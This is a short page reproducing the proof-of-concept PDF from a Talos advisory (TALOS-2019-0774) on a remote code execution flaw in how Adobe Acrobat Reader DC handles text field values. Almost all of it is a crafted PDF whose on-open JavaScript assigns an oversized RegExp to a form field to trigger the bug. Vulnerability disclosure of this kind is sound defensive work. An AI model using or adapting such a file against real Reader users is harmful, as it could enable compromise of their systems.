Info
From Talos :
Adobe Acrobat Reader DC text field value remote code execution vulnerability — redux
PoC
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 
 | %PDF-1.5
 1 0 obj
 <<
 /Kids
 [<<
 /Annots
 [<<
 /Subtype /Text
 /Rect[0 0 0 0]
 /Subj (Hello World!)
 >>
 <<
 /Subtype /Text
 /Rect[0 0 0 0]
 /Subj (Hello zzzWorld!)
 >>]
 /Parent 1 0 R
 /Contents[3 0 R]
 >>]
 /Resources<<>>
 >>
 %endobj
 
 
 3 0 obj<<>>
 stream
 BT/F1 105 Tf 0 400 Td(Adobe Reader)Tj ET
 endstream
 endobj
 
 trailer
 <<
 /Root
 <<
 /AcroForm
 <<
 /Fields
 [
 <<
 /Rect[10 10 10 10]
 /Subtype/Widget
 /T(mytext)
 /V(this is a text)
 /FT/Tx
 >>
 ]
 >>
 /OpenAction
 <<
 /S /JavaScript
 /JS(
 var r = new RegExp(Array(32770).join(String.fromCharCode(24)));
 this.getField('mytext')['value'] = r;
 )
 >>
 /Pages 1 0 R
 >>
 >>
 
 | 
Reference
TALOS-2019-0774